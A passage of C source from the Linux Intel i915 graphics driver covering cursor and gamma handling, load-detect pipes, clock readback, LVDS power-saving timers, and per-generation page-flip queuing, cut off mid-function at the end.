static int intel_crtc_cursor_move(struct drm_crtc *crtc, int x, int y)
{
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
intel_crtc->cursor_x = x;
intel_crtc->cursor_y = y;
intel_crtc_update_cursor(crtc, true);
return 0;
}
/** Sets the color ramps on behalf of RandR */
void intel_crtc_fb_gamma_set(struct drm_crtc *crtc, u16 red, u16 green,
u16 blue, int regno)
{
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
intel_crtc->lut_r[regno] = red >> 8;
intel_crtc->lut_g[regno] = green >> 8;
intel_crtc->lut_b[regno] = blue >> 8;
}
void intel_crtc_fb_gamma_get(struct drm_crtc *crtc, u16 *red, u16 *green,
u16 *blue, int regno)
{
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
*red = intel_crtc->lut_r[regno] << 8;
*green = intel_crtc->lut_g[regno] << 8;
*blue = intel_crtc->lut_b[regno] << 8;
}
static void intel_crtc_gamma_set(struct drm_crtc *crtc, u16 *red, u16 *green,
u16 *blue, uint32_t start, uint32_t size)
{
int end = (start + size > 256) ? 256 : start + size, i;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
for (i = start; i < end; i++) {
intel_crtc->lut_r[i] = red[i] >> 8;
intel_crtc->lut_g[i] = green[i] >> 8;
intel_crtc->lut_b[i] = blue[i] >> 8;
}
intel_crtc_load_lut(crtc);
}
/**
* Get a pipe with a simple mode set on it for doing load-based monitor
* detection.
*
* It will be up to the load-detect code to adjust the pipe as appropriate for
* its requirements. The pipe will be connected to no other encoders.
*
* Currently this code will only succeed if there is a pipe with no encoders
* configured for it. In the future, it could choose to temporarily disable
* some outputs to free up a pipe for its use.
*
* \return crtc, or NULL if no pipes are available.
*/
/* VESA 640x480x72Hz mode to set on the pipe */
static struct drm_display_mode load_detect_mode = {
DRM_MODE("640x480", DRM_MODE_TYPE_DEFAULT, 31500, 640, 664,
704, 832, 0, 480, 489, 491, 520, 0, DRM_MODE_FLAG_NHSYNC | DRM_MODE_FLAG_NVSYNC),
};
static struct drm_framebuffer *
intel_framebuffer_create(struct drm_device *dev,
struct drm_mode_fb_cmd *mode_cmd,
struct drm_i915_gem_object *obj)
{
struct intel_framebuffer *intel_fb;
int ret;
intel_fb = kzalloc(sizeof(*intel_fb), GFP_KERNEL);
if (!intel_fb) {
drm_gem_object_unreference_unlocked(&obj->base);
return ERR_PTR(-ENOMEM);
}
ret = intel_framebuffer_init(dev, intel_fb, mode_cmd, obj);
if (ret) {
drm_gem_object_unreference_unlocked(&obj->base);
kfree(intel_fb);
return ERR_PTR(ret);
}
return &intel_fb->base;
}
static u32
intel_framebuffer_pitch_for_width(int width, int bpp)
{
u32 pitch = DIV_ROUND_UP(width * bpp, 8);
return ALIGN(pitch, 64);
}
static u32
intel_framebuffer_size_for_mode(struct drm_display_mode *mode, int bpp)
{
u32 pitch = intel_framebuffer_pitch_for_width(mode->hdisplay, bpp);
return ALIGN(pitch * mode->vdisplay, PAGE_SIZE);
}
static struct drm_framebuffer *
intel_framebuffer_create_for_mode(struct drm_device *dev,
struct drm_display_mode *mode,
int depth, int bpp)
{
struct drm_i915_gem_object *obj;
struct drm_mode_fb_cmd mode_cmd;
obj = i915_gem_alloc_object(dev,
intel_framebuffer_size_for_mode(mode, bpp));
if (obj == NULL)
return ERR_PTR(-ENOMEM);
mode_cmd.width = mode->hdisplay;
mode_cmd.height = mode->vdisplay;
mode_cmd.depth = depth;
mode_cmd.bpp = bpp;
mode_cmd.pitch = intel_framebuffer_pitch_for_width(mode_cmd.width, bpp);
return intel_framebuffer_create(dev, &mode_cmd, obj);
}
static struct drm_framebuffer *
mode_fits_in_fbdev(struct drm_device *dev,
struct drm_display_mode *mode)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct drm_i915_gem_object *obj;
struct drm_framebuffer *fb;
if (dev_priv->fbdev == NULL)
return NULL;
obj = dev_priv->fbdev->ifb.obj;
if (obj == NULL)
return NULL;
fb = &dev_priv->fbdev->ifb.base;
if (fb->pitch < intel_framebuffer_pitch_for_width(mode->hdisplay,
fb->bits_per_pixel))
return NULL;
if (obj->base.size < mode->vdisplay * fb->pitch)
return NULL;
return fb;
}
bool intel_get_load_detect_pipe(struct intel_encoder *intel_encoder,
struct drm_connector *connector,
struct drm_display_mode *mode,
struct intel_load_detect_pipe *old)
{
struct intel_crtc *intel_crtc;
struct drm_crtc *possible_crtc;
struct drm_encoder *encoder = &intel_encoder->base;
struct drm_crtc *crtc = NULL;
struct drm_device *dev = encoder->dev;
struct drm_framebuffer *old_fb;
int i = -1;
DRM_DEBUG_KMS("[CONNECTOR:%d:%s], [ENCODER:%d:%s]\n",
connector->base.id, drm_get_connector_name(connector),
encoder->base.id, drm_get_encoder_name(encoder));
/*
* Algorithm gets a little messy:
*
* - if the connector already has an assigned crtc, use it (but make
* sure it's on first)
*
* - try to find the first unused crtc that can drive this connector,
* and use that if we find one
*/
/* See if we already have a CRTC for this connector */
if (encoder->crtc) {
crtc = encoder->crtc;
intel_crtc = to_intel_crtc(crtc);
old->dpms_mode = intel_crtc->dpms_mode;
old->load_detect_temp = false;
/* Make sure the crtc and connector are running */
if (intel_crtc->dpms_mode != DRM_MODE_DPMS_ON) {
struct drm_encoder_helper_funcs *encoder_funcs;
struct drm_crtc_helper_funcs *crtc_funcs;
crtc_funcs = crtc->helper_private;
crtc_funcs->dpms(crtc, DRM_MODE_DPMS_ON);
encoder_funcs = encoder->helper_private;
encoder_funcs->dpms(encoder, DRM_MODE_DPMS_ON);
}
return true;
}
/* Find an unused one (if possible) */
list_for_each_entry(possible_crtc, &dev->mode_config.crtc_list, head) {
i++;
if (!(encoder->possible_crtcs & (1 << i)))
continue;
if (!possible_crtc->enabled) {
crtc = possible_crtc;
break;
}
}
/*
* If we didn't find an unused CRTC, don't use any.
*/
if (!crtc) {
DRM_DEBUG_KMS("no pipe available for load-detect\n");
return false;
}
encoder->crtc = crtc;
connector->encoder = encoder;
intel_crtc = to_intel_crtc(crtc);
old->dpms_mode = intel_crtc->dpms_mode;
old->load_detect_temp = true;
old->release_fb = NULL;
if (!mode)
mode = &load_detect_mode;
old_fb = crtc->fb;
/* We need a framebuffer large enough to accommodate all accesses
* that the plane may generate whilst we perform load detection.
* We can not rely on the fbcon either being present (we get called
* during its initialisation to detect all boot displays, or it may
* not even exist) or that it is large enough to satisfy the
* requested mode.
*/
crtc->fb = mode_fits_in_fbdev(dev, mode);
if (crtc->fb == NULL) {
DRM_DEBUG_KMS("creating tmp fb for load-detection\n");
crtc->fb = intel_framebuffer_create_for_mode(dev, mode, 24, 32);
old->release_fb = crtc->fb;
} else
DRM_DEBUG_KMS("reusing fbdev for load-detection framebuffer\n");
if (IS_ERR(crtc->fb)) {
DRM_DEBUG_KMS("failed to allocate framebuffer for load-detection\n");
crtc->fb = old_fb;
return false;
}
if (!drm_crtc_helper_set_mode(crtc, mode, 0, 0, old_fb)) {
DRM_DEBUG_KMS("failed to set mode on load-detect pipe\n");
if (old->release_fb)
old->release_fb->funcs->destroy(old->release_fb);
crtc->fb = old_fb;
return false;
}
/* let the connector get through one full cycle before testing */
intel_wait_for_vblank(dev, intel_crtc->pipe);
return true;
}
void intel_release_load_detect_pipe(struct intel_encoder *intel_encoder,
struct drm_connector *connector,
struct intel_load_detect_pipe *old)
{
struct drm_encoder *encoder = &intel_encoder->base;
struct drm_device *dev = encoder->dev;
struct drm_crtc *crtc = encoder->crtc;
struct drm_encoder_helper_funcs *encoder_funcs = encoder->helper_private;
struct drm_crtc_helper_funcs *crtc_funcs = crtc->helper_private;
DRM_DEBUG_KMS("[CONNECTOR:%d:%s], [ENCODER:%d:%s]\n",
connector->base.id, drm_get_connector_name(connector),
encoder->base.id, drm_get_encoder_name(encoder));
if (old->load_detect_temp) {
connector->encoder = NULL;
drm_helper_disable_unused_functions(dev);
if (old->release_fb)
old->release_fb->funcs->destroy(old->release_fb);
return;
}
/* Switch crtc and encoder back off if necessary */
if (old->dpms_mode != DRM_MODE_DPMS_ON) {
encoder_funcs->dpms(encoder, old->dpms_mode);
crtc_funcs->dpms(crtc, old->dpms_mode);
}
}
/* Returns the clock of the currently programmed mode of the given pipe. */
static int intel_crtc_clock_get(struct drm_device *dev, struct drm_crtc *crtc)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
u32 dpll = I915_READ(DPLL(pipe));
u32 fp;
intel_clock_t clock;
if ((dpll & DISPLAY_RATE_SELECT_FPA1) == 0)
fp = I915_READ(FP0(pipe));
else
fp = I915_READ(FP1(pipe));
clock.m1 = (fp & FP_M1_DIV_MASK) >> FP_M1_DIV_SHIFT;
if (IS_PINEVIEW(dev)) {
clock.n = ffs((fp & FP_N_PINEVIEW_DIV_MASK) >> FP_N_DIV_SHIFT) - 1;
clock.m2 = (fp & FP_M2_PINEVIEW_DIV_MASK) >> FP_M2_DIV_SHIFT;
} else {
clock.n = (fp & FP_N_DIV_MASK) >> FP_N_DIV_SHIFT;
clock.m2 = (fp & FP_M2_DIV_MASK) >> FP_M2_DIV_SHIFT;
}
if (!IS_GEN2(dev)) {
if (IS_PINEVIEW(dev))
clock.p1 = ffs((dpll & DPLL_FPA01_P1_POST_DIV_MASK_PINEVIEW) >>
DPLL_FPA01_P1_POST_DIV_SHIFT_PINEVIEW);
else
clock.p1 = ffs((dpll & DPLL_FPA01_P1_POST_DIV_MASK) >>
DPLL_FPA01_P1_POST_DIV_SHIFT);
switch (dpll & DPLL_MODE_MASK) {
case DPLLB_MODE_DAC_SERIAL:
clock.p2 = dpll & DPLL_DAC_SERIAL_P2_CLOCK_DIV_5 ?
5 : 10;
break;
case DPLLB_MODE_LVDS:
clock.p2 = dpll & DPLLB_LVDS_P2_CLOCK_DIV_7 ?
7 : 14;
break;
default:
DRM_DEBUG_KMS("Unknown DPLL mode %08x in programmed "
"mode\n", (int)(dpll & DPLL_MODE_MASK));
return 0;
}
/* XXX: Handle the 100Mhz refclk */
intel_clock(dev, 96000, &clock);
} else {
bool is_lvds = (pipe == 1) && (I915_READ(LVDS) & LVDS_PORT_EN);
if (is_lvds) {
clock.p1 = ffs((dpll & DPLL_FPA01_P1_POST_DIV_MASK_I830_LVDS) >>
DPLL_FPA01_P1_POST_DIV_SHIFT);
clock.p2 = 14;
if ((dpll & PLL_REF_INPUT_MASK) ==
PLLB_REF_INPUT_SPREADSPECTRUMIN) {
/* XXX: might not be 66MHz */
intel_clock(dev, 66000, &clock);
} else
intel_clock(dev, 48000, &clock);
} else {
if (dpll & PLL_P1_DIVIDE_BY_TWO)
clock.p1 = 2;
else {
clock.p1 = ((dpll & DPLL_FPA01_P1_POST_DIV_MASK_I830) >>
DPLL_FPA01_P1_POST_DIV_SHIFT) + 2;
}
if (dpll & PLL_P2_DIVIDE_BY_4)
clock.p2 = 4;
else
clock.p2 = 2;
intel_clock(dev, 48000, &clock);
}
}
/* XXX: It would be nice to validate the clocks, but we can't reuse
* i830PllIsValid() because it relies on the xf86_config connector
* configuration being accurate, which it isn't necessarily.
*/
return clock.dot;
}
/** Returns the currently programmed mode of the given pipe. */
struct drm_display_mode *intel_crtc_mode_get(struct drm_device *dev,
struct drm_crtc *crtc)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
struct drm_display_mode *mode;
int htot = I915_READ(HTOTAL(pipe));
int hsync = I915_READ(HSYNC(pipe));
int vtot = I915_READ(VTOTAL(pipe));
int vsync = I915_READ(VSYNC(pipe));
mode = kzalloc(sizeof(*mode), GFP_KERNEL);
if (!mode)
return NULL;
mode->clock = intel_crtc_clock_get(dev, crtc);
mode->hdisplay = (htot & 0xffff) + 1;
mode->htotal = ((htot & 0xffff0000) >> 16) + 1;
mode->hsync_start = (hsync & 0xffff) + 1;
mode->hsync_end = ((hsync & 0xffff0000) >> 16) + 1;
mode->vdisplay = (vtot & 0xffff) + 1;
mode->vtotal = ((vtot & 0xffff0000) >> 16) + 1;
mode->vsync_start = (vsync & 0xffff) + 1;
mode->vsync_end = ((vsync & 0xffff0000) >> 16) + 1;
drm_mode_set_name(mode);
drm_mode_set_crtcinfo(mode, 0);
return mode;
}
#define GPU_IDLE_TIMEOUT 500 /* ms */
/* When this timer fires, we've been idle for awhile */
static void intel_gpu_idle_timer(unsigned long arg)
{
struct drm_device *dev = (struct drm_device *)arg;
drm_i915_private_t *dev_priv = dev->dev_private;
if (!list_empty(&dev_priv->mm.active_list)) {
/* Still processing requests, so just re-arm the timer. */
mod_timer(&dev_priv->idle_timer, jiffies +
msecs_to_jiffies(GPU_IDLE_TIMEOUT));
return;
}
dev_priv->busy = false;
queue_work(dev_priv->wq, &dev_priv->idle_work);
}
#define CRTC_IDLE_TIMEOUT 1000 /* ms */
static void intel_crtc_idle_timer(unsigned long arg)
{
struct intel_crtc *intel_crtc = (struct intel_crtc *)arg;
struct drm_crtc *crtc = &intel_crtc->base;
drm_i915_private_t *dev_priv = crtc->dev->dev_private;
struct intel_framebuffer *intel_fb;
intel_fb = to_intel_framebuffer(crtc->fb);
if (intel_fb && intel_fb->obj->active) {
/* The framebuffer is still being accessed by the GPU. */
mod_timer(&intel_crtc->idle_timer, jiffies +
msecs_to_jiffies(CRTC_IDLE_TIMEOUT));
return;
}
intel_crtc->busy = false;
queue_work(dev_priv->wq, &dev_priv->idle_work);
}
static void intel_increase_pllclock(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
drm_i915_private_t *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
int dpll_reg = DPLL(pipe);
int dpll;
if (HAS_PCH_SPLIT(dev))
return;
if (!dev_priv->lvds_downclock_avail)
return;
dpll = I915_READ(dpll_reg);
if (!HAS_PIPE_CXSR(dev) && (dpll & DISPLAY_RATE_SELECT_FPA1)) {
DRM_DEBUG_DRIVER("upclocking LVDS\n");
/* Unlock panel regs */
I915_WRITE(PP_CONTROL,
I915_READ(PP_CONTROL) | PANEL_UNLOCK_REGS);
dpll &= ~DISPLAY_RATE_SELECT_FPA1;
I915_WRITE(dpll_reg, dpll);
intel_wait_for_vblank(dev, pipe);
dpll = I915_READ(dpll_reg);
if (dpll & DISPLAY_RATE_SELECT_FPA1)
DRM_DEBUG_DRIVER("failed to upclock LVDS!\n");
/* ...and lock them again */
I915_WRITE(PP_CONTROL, I915_READ(PP_CONTROL) & 0x3);
}
/* Schedule downclock */
mod_timer(&intel_crtc->idle_timer, jiffies +
msecs_to_jiffies(CRTC_IDLE_TIMEOUT));
}
static void intel_decrease_pllclock(struct drm_crtc *crtc)
{
struct drm_device *dev = crtc->dev;
drm_i915_private_t *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
int pipe = intel_crtc->pipe;
int dpll_reg = DPLL(pipe);
int dpll = I915_READ(dpll_reg);
if (HAS_PCH_SPLIT(dev))
return;
if (!dev_priv->lvds_downclock_avail)
return;
/*
* Since this is called by a timer, we should never get here in
* the manual case.
*/
if (!HAS_PIPE_CXSR(dev) && intel_crtc->lowfreq_avail) {
DRM_DEBUG_DRIVER("downclocking LVDS\n");
/* Unlock panel regs */
I915_WRITE(PP_CONTROL, I915_READ(PP_CONTROL) |
PANEL_UNLOCK_REGS);
dpll |= DISPLAY_RATE_SELECT_FPA1;
I915_WRITE(dpll_reg, dpll);
intel_wait_for_vblank(dev, pipe);
dpll = I915_READ(dpll_reg);
if (!(dpll & DISPLAY_RATE_SELECT_FPA1))
DRM_DEBUG_DRIVER("failed to downclock LVDS!\n");
/* ...and lock them again */
I915_WRITE(PP_CONTROL, I915_READ(PP_CONTROL) & 0x3);
}
}
/**
* intel_idle_update - adjust clocks for idleness
* @work: work struct
*
* Either the GPU or display (or both) went idle. Check the busy status
* here and adjust the CRTC and GPU clocks as necessary.
*/
static void intel_idle_update(struct work_struct *work)
{
drm_i915_private_t *dev_priv = container_of(work, drm_i915_private_t,
idle_work);
struct drm_device *dev = dev_priv->dev;
struct drm_crtc *crtc;
struct intel_crtc *intel_crtc;
if (!i915_powersave)
return;
mutex_lock(&dev->struct_mutex);
i915_update_gfx_val(dev_priv);
list_for_each_entry(crtc, &dev->mode_config.crtc_list, head) {
/* Skip inactive CRTCs */
if (!crtc->fb)
continue;
intel_crtc = to_intel_crtc(crtc);
if (!intel_crtc->busy)
intel_decrease_pllclock(crtc);
}
mutex_unlock(&dev->struct_mutex);
}
/**
* intel_mark_busy - mark the GPU and possibly the display busy
* @dev: drm device
* @obj: object we're operating on
*
* Callers can use this function to indicate that the GPU is busy processing
* commands. If @obj matches one of the CRTC objects (i.e. it's a scanout
* buffer), we'll also mark the display as busy, so we know to increase its
* clock frequency.
*/
void intel_mark_busy(struct drm_device *dev, struct drm_i915_gem_object *obj)
{
drm_i915_private_t *dev_priv = dev->dev_private;
struct drm_crtc *crtc = NULL;
struct intel_framebuffer *intel_fb;
struct intel_crtc *intel_crtc;
if (!drm_core_check_feature(dev, DRIVER_MODESET))
return;
if (!dev_priv->busy)
dev_priv->busy = true;
else
mod_timer(&dev_priv->idle_timer, jiffies +
msecs_to_jiffies(GPU_IDLE_TIMEOUT));
list_for_each_entry(crtc, &dev->mode_config.crtc_list, head) {
if (!crtc->fb)
continue;
intel_crtc = to_intel_crtc(crtc);
intel_fb = to_intel_framebuffer(crtc->fb);
if (intel_fb->obj == obj) {
if (!intel_crtc->busy) {
/* Non-busy -> busy, upclock */
intel_increase_pllclock(crtc);
intel_crtc->busy = true;
} else {
/* Busy -> busy, put off timer */
mod_timer(&intel_crtc->idle_timer, jiffies +
msecs_to_jiffies(CRTC_IDLE_TIMEOUT));
}
}
}
}
static void intel_crtc_destroy(struct drm_crtc *crtc)
{
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
struct drm_device *dev = crtc->dev;
struct intel_unpin_work *work;
unsigned long flags;
spin_lock_irqsave(&dev->event_lock, flags);
work = intel_crtc->unpin_work;
intel_crtc->unpin_work = NULL;
spin_unlock_irqrestore(&dev->event_lock, flags);
if (work) {
cancel_work_sync(&work->work);
kfree(work);
}
drm_crtc_cleanup(crtc);
kfree(intel_crtc);
}
static void intel_unpin_work_fn(struct work_struct *__work)
{
struct intel_unpin_work *work =
container_of(__work, struct intel_unpin_work, work);
mutex_lock(&work->dev->struct_mutex);
i915_gem_object_unpin(work->old_fb_obj);
drm_gem_object_unreference(&work->pending_flip_obj->base);
drm_gem_object_unreference(&work->old_fb_obj->base);
intel_update_fbc(work->dev);
mutex_unlock(&work->dev->struct_mutex);
kfree(work);
}
static void do_intel_finish_page_flip(struct drm_device *dev,
struct drm_crtc *crtc)
{
drm_i915_private_t *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
struct intel_unpin_work *work;
struct drm_i915_gem_object *obj;
struct drm_pending_vblank_event *e;
struct timeval tnow, tvbl;
unsigned long flags;
/* Ignore early vblank irqs */
if (intel_crtc == NULL)
return;
do_gettimeofday(&tnow);
spin_lock_irqsave(&dev->event_lock, flags);
work = intel_crtc->unpin_work;
if (work == NULL || !work->pending) {
spin_unlock_irqrestore(&dev->event_lock, flags);
return;
}
intel_crtc->unpin_work = NULL;
if (work->event) {
e = work->event;
e->event.sequence = drm_vblank_count_and_time(dev, intel_crtc->pipe, &tvbl);
/* Called before vblank count and timestamps have
* been updated for the vblank interval of flip
* completion? Need to increment vblank count and
* add one videorefresh duration to returned timestamp
* to account for this. We assume this happened if we
* get called over 0.9 frame durations after the last
* timestamped vblank.
*
* This calculation can not be used with vrefresh rates
* below 5Hz (10Hz to be on the safe side) without
* promoting to 64 integers.
*/
if (10 * (timeval_to_ns(&tnow) - timeval_to_ns(&tvbl)) >
9 * crtc->framedur_ns) {
e->event.sequence++;
tvbl = ns_to_timeval(timeval_to_ns(&tvbl) +
crtc->framedur_ns);
}
e->event.tv_sec = tvbl.tv_sec;
e->event.tv_usec = tvbl.tv_usec;
list_add_tail(&e->base.link,
&e->base.file_priv->event_list);
wake_up_interruptible(&e->base.file_priv->event_wait);
}
drm_vblank_put(dev, intel_crtc->pipe);
spin_unlock_irqrestore(&dev->event_lock, flags);
obj = work->old_fb_obj;
atomic_clear_mask(1 << intel_crtc->plane,
&obj->pending_flip.counter);
if (atomic_read(&obj->pending_flip) == 0)
wake_up(&dev_priv->pending_flip_queue);
schedule_work(&work->work);
trace_i915_flip_complete(intel_crtc->plane, work->pending_flip_obj);
}
void intel_finish_page_flip(struct drm_device *dev, int pipe)
{
drm_i915_private_t *dev_priv = dev->dev_private;
struct drm_crtc *crtc = dev_priv->pipe_to_crtc_mapping[pipe];
do_intel_finish_page_flip(dev, crtc);
}
void intel_finish_page_flip_plane(struct drm_device *dev, int plane)
{
drm_i915_private_t *dev_priv = dev->dev_private;
struct drm_crtc *crtc = dev_priv->plane_to_crtc_mapping[plane];
do_intel_finish_page_flip(dev, crtc);
}
void intel_prepare_page_flip(struct drm_device *dev, int plane)
{
drm_i915_private_t *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc =
to_intel_crtc(dev_priv->plane_to_crtc_mapping[plane]);
unsigned long flags;
spin_lock_irqsave(&dev->event_lock, flags);
if (intel_crtc->unpin_work) {
if ((++intel_crtc->unpin_work->pending) > 1)
DRM_ERROR("Prepared flip multiple times\n");
} else {
DRM_DEBUG_DRIVER("preparing flip with no unpin work?\n");
}
spin_unlock_irqrestore(&dev->event_lock, flags);
}
static int intel_gen2_queue_flip(struct drm_device *dev,
struct drm_crtc *crtc,
struct drm_framebuffer *fb,
struct drm_i915_gem_object *obj)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
unsigned long offset;
u32 flip_mask;
int ret;
ret = intel_pin_and_fence_fb_obj(dev, obj, LP_RING(dev_priv));
if (ret)
goto out;
/* Offset into the new buffer for cases of shared fbs between CRTCs */
offset = crtc->y * fb->pitch + crtc->x * fb->bits_per_pixel/8;
ret = BEGIN_LP_RING(6);
if (ret)
goto out;
/* Can't queue multiple flips, so wait for the previous
* one to finish before executing the next.
*/
if (intel_crtc->plane)
flip_mask = MI_WAIT_FOR_PLANE_B_FLIP;
else
flip_mask = MI_WAIT_FOR_PLANE_A_FLIP;
OUT_RING(MI_WAIT_FOR_EVENT | flip_mask);
OUT_RING(MI_NOOP);
OUT_RING(MI_DISPLAY_FLIP |
MI_DISPLAY_FLIP_PLANE(intel_crtc->plane));
OUT_RING(fb->pitch);
OUT_RING(obj->gtt_offset + offset);
OUT_RING(MI_NOOP);
ADVANCE_LP_RING();
out:
return ret;
}
static int intel_gen3_queue_flip(struct drm_device *dev,
struct drm_crtc *crtc,
struct drm_framebuffer *fb,
struct drm_i915_gem_object *obj)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
unsigned long offset;
u32 flip_mask;
int ret;
ret = intel_pin_and_fence_fb_obj(dev, obj, LP_RING(dev_priv));
if (ret)
goto out;
/* Offset into the new buffer for cases of shared fbs between CRTCs */
offset = crtc->y * fb->pitch + crtc->x * fb->bits_per_pixel/8;
ret = BEGIN_LP_RING(6);
if (ret)
goto out;
if (intel_crtc->plane)
flip_mask = MI_WAIT_FOR_PLANE_B_FLIP;
else
flip_mask = MI_WAIT_FOR_PLANE_A_FLIP;
OUT_RING(MI_WAIT_FOR_EVENT | flip_mask);
OUT_RING(MI_NOOP);
OUT_RING(MI_DISPLAY_FLIP_I915 |
MI_DISPLAY_FLIP_PLANE(intel_crtc->plane));
OUT_RING(fb->pitch);
OUT_RING(obj->gtt_offset + offset);
OUT_RING(MI_NOOP);
ADVANCE_LP_RING();
out:
return ret;
}
static int intel_gen4_queue_flip(struct drm_device *dev,
struct drm_crtc *crtc,
struct drm_framebuffer *fb,
struct drm_i915_gem_object *obj)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
uint32_t pf, pipesrc;
int ret;
ret = intel_pin_and_fence_fb_obj(dev, obj, LP_RING(dev_priv));
if (ret)
goto out;
ret = BEGIN_LP_RING(4);
if (ret)
goto out;
/* i965+ uses the linear or tiled offsets from the
* Display Registers (which do not change across a page-flip)
* so we need only reprogram the base address.
*/
OUT_RING(MI_DISPLAY_FLIP |
MI_DISPLAY_FLIP_PLANE(intel_crtc->plane));
OUT_RING(fb->pitch);
OUT_RING(obj->gtt_offset | obj->tiling_mode);
/* XXX Enabling the panel-fitter across page-flip is so far
* untested on non-native modes, so ignore it for now.
* pf = I915_READ(pipe == 0 ? PFA_CTL_1 : PFB_CTL_1) & PF_ENABLE;
*/
pf = 0;
pipesrc = I915_READ(PIPESRC(intel_crtc->pipe)) & 0x0fff0fff;
OUT_RING(pf | pipesrc);
ADVANCE_LP_RING();
out:
return ret;
}
static int intel_gen6_queue_flip(struct drm_device *dev,
struct drm_crtc *crtc,
struct drm_framebuffer *fb,
struct drm_i915_gem_object *obj)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
uint32_t pf, pipesrc;
int ret;
ret = intel_pin_and_fence_fb_obj(dev, obj, LP_RING(dev_priv));
if (ret)
goto out;
ret = BEGIN_LP_RING(4);
if (ret)
goto out;
OUT_RING(MI_DISPLAY_FLIP |
MI_DISPLAY_FLIP_PLANE(intel_crtc->plane));
OUT_RING(fb->pitch | obj->tiling_mode);
OUT_RING(obj->gtt_offset);
pf = I915_READ(PF_CTL(intel_crtc->pipe)) & PF_ENABLE;
pipesrc = I915_READ(PIPESRC(intel_crtc->pipe)) & 0x0fff0fff;
OUT_RING(pf | pipesrc);
ADVANCE_LP_RING();
out:
return ret;
}
/*
* On gen7 we currently use the blit ring because (in early silicon at least)
* the render ring doesn't give us interrpts for page flip completion, which
* means clients will hang after the first flip is queued. Fortunately the
* blit ring generates interrupts properly, so use it instead.
*/
static int intel_gen7_queue_flip(struct drm_device *dev,
struct drm_crtc *crtc,
struct drm_framebuffer *fb,
struct drm_i915_gem_object *obj)
{
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
struct intel_ring_buffer *ring = &dev_priv->ring[BCS];
int ret;
ret = intel_pin_and_fence_fb_obj(dev, obj, ring);
if (ret)
goto out;
ret = intel_ring_begin(ring, 4);
if (ret)
goto out;
intel_ring_emit(ring, MI_DISPLAY_FLIP_I915 | (intel_crtc->plane << 19));
intel_ring_emit(ring, (fb->pitch | obj->tiling_mode));
intel_ring_emit(ring, (obj->gtt_offset));
intel_ring_emit(ring, (MI_NOOP));
intel_ring_advance(ring);
out:
return ret;
}
static int intel_default_queue_flip(struct drm_device *dev,
struct drm_crtc *crtc,
struct drm_framebuffer *fb,
struct drm_i915_gem_object *obj)
{
return -ENODEV;
}
static int intel_crtc_page_flip(struct drm_crtc *crtc,
struct drm_framebuffer *fb,
struct drm_pending_vblank_event *event)
{
struct drm_device *dev = crtc->dev;
struct drm_i915_private *dev_priv = dev->dev_private;
struct intel_framebuffer *intel_fb;
struct drm_i915_gem_object *obj;
struct intel_crtc *intel_crtc = to_intel_crtc(crtc);
struct intel_unpin_work *work;
unsigned long flags;
int ret;
work = kzalloc(sizeof *work, GFP_KERNEL);
if (work == NULL)
return -ENOMEM;
work->event = event;
work->dev = crtc->dev;
intel_fb = to_intel_framebuffer(crtc->fb);
work->old_fb_obj = intel_fb->obj;
INIT_WORK(&work->work, intel_unpin_work_fn);
/* We borrow the event spin lock for protecting unpin_work */
spin_lock_irqsave(&dev->event_lock, flags);
if (intel_crtc->unpin_work) {
spin_unlock_irqrestore(&dev->event_lock, flags);
kfree(work);
DRM_DEBUG_DRIVER("flip queue: crtc already busy\n");
return -EBUSY;
}
intel_crtc->unpin_work = work;
spin_unlock_irqrestore(&dev->event_lock, flags);
intel_fb = to_intel_framebuffer(fb);
obj = intel_fb->obj;
mutex_lock(&dev->struct_mutex);
/* Reference the objects for the scheduled work. */
drm_gem_object_reference(&work->old_fb_obj->base);
drm_gem_object_reference(&obj->base);
crtc->fb = fb;
ret = drm_vblank_get(dev, intel_crtc->pipe);
if (ret)
goto cleanup_objs;
work->pending_flip_obj = obj;
work->enable_stall_check = true;
/* Block clients from rendering to the new back buffer until
* the flip occurs and the object is no longer visible.
*/
atomic_add(1 << intel_crtc->plane, &work->old_fb_obj->pending_flip);
ret = dev_priv->display.queue_flip(dev, crtc, fb, obj);
if (ret)
goto cleanup_pending;
intel_disable_fbc(dev);
mutex_unlock(&dev->struct_mutex);
trace_i915_flip_request(intel_crtc->plane, obj);
return 0;
cleanup_pending:
atomic_sub(1 << intel_crtc->plane, &work->old_fb_obj->pending_flip);
cleanup_objs:
drm_gem_object_unreference(&work->old_fb_obj->base);
drm_gem_object_unreference(&obj->base);
mutex_unlock(&dev->struct_mutex);
spin_lock_irqsave(&dev->event_lock, flags);
intel_crtc->unpin_work = NULL;
spin_unlock_irqrestore(&dev->event_lock, flags);
kfree(work);
return ret;
}
static void intel_sanitize_modesetting(struct drm_device *dev,
int pipe, int plane)
{
struct drm_i915_private *dev_priv = dev->dev_private;
u32 reg, val;
if (HAS_PCH_SPLIT(dev))
return;
/* Who knows what state these registers were left in by the BIOS or
* grub?
*
* If we leave the registers in a conflicting state (e.g. with the
* display plane reading from the other pipe than the one we intend
* to use) then when we attempt to teardown the active mode, we will
* not disable the pipes and planes in the correct order -- leaving
* a plane reading from a disabled pipe and possibly leading to
* undefined behaviour.
*/
reg = DSPCNTR(plane);
val = I915_READ(reg);
